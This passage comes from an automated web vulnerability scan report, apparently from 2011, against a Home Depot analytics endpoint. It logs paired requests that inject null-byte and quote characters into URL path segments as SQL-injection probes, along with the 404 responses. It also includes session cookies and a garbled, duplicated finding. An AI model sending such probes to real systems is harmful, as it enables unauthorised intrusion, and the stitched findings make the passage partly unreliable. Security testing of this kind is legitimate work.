User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:03:04 GMT
Server: Omniture DC/2.0.0
xserver: www339
Content-Length: 0
Content-Type: text/html

1.43. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1405035742937 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s1405035742937

Issue detail

Remediation detail

Request 1

GET /b%00'/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/homedepot/1/H.22.1/s1405035742937?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A57%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:29:02 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html

1.44. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14229447680702 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s14229447680702

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s14229447680702 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s14229447680702%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A59%3A30%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:39:37 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html

1.45. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14671218963339 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s14671218963339

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s14671218963339?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A35%3A37%204%20300&ce=UTF-8&ns=homedepot&g=http%3A%2F%2Fwww.homedepot.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FQuickViewService%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26R%3D202642971%26catEntryId%3D202642971&cc=USD&events=event2%2Cevent4%2Cevent10%2CscAdd&products=%3B202642971%3B%3B%3Bevent2%3D1%7Cevent4%3DNaN%3BeVar51%3D202642971%7CeVar53%3DQuickView&v4=direct&c35=undefined&v48=D%3Doid&v59=outdoors%3Eoutdoor%20power%20equipment%3Eriding%20mowers%3Egas%20riding%20mowers&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: wasc.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224128012%3a%3bC25%5fEXP%3d1360064128%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227733524%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2csZf7DPHUi0hdDP19QLx%2fYlyNeuk%3d; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html

1.46. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14691738680163 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s14691738680163

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html

1.47. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15323097258507 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s15323097258507

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
xserver: www320
Content-Length: 0
Content-Type: text/html

1.48. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15357372987793 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s15357372987793

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html

1.49. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15506593697366 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s15506593697366

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s1593516894569

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s1593516894569 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html

1.53. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16203244941575 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s16203244941575

Issue detail

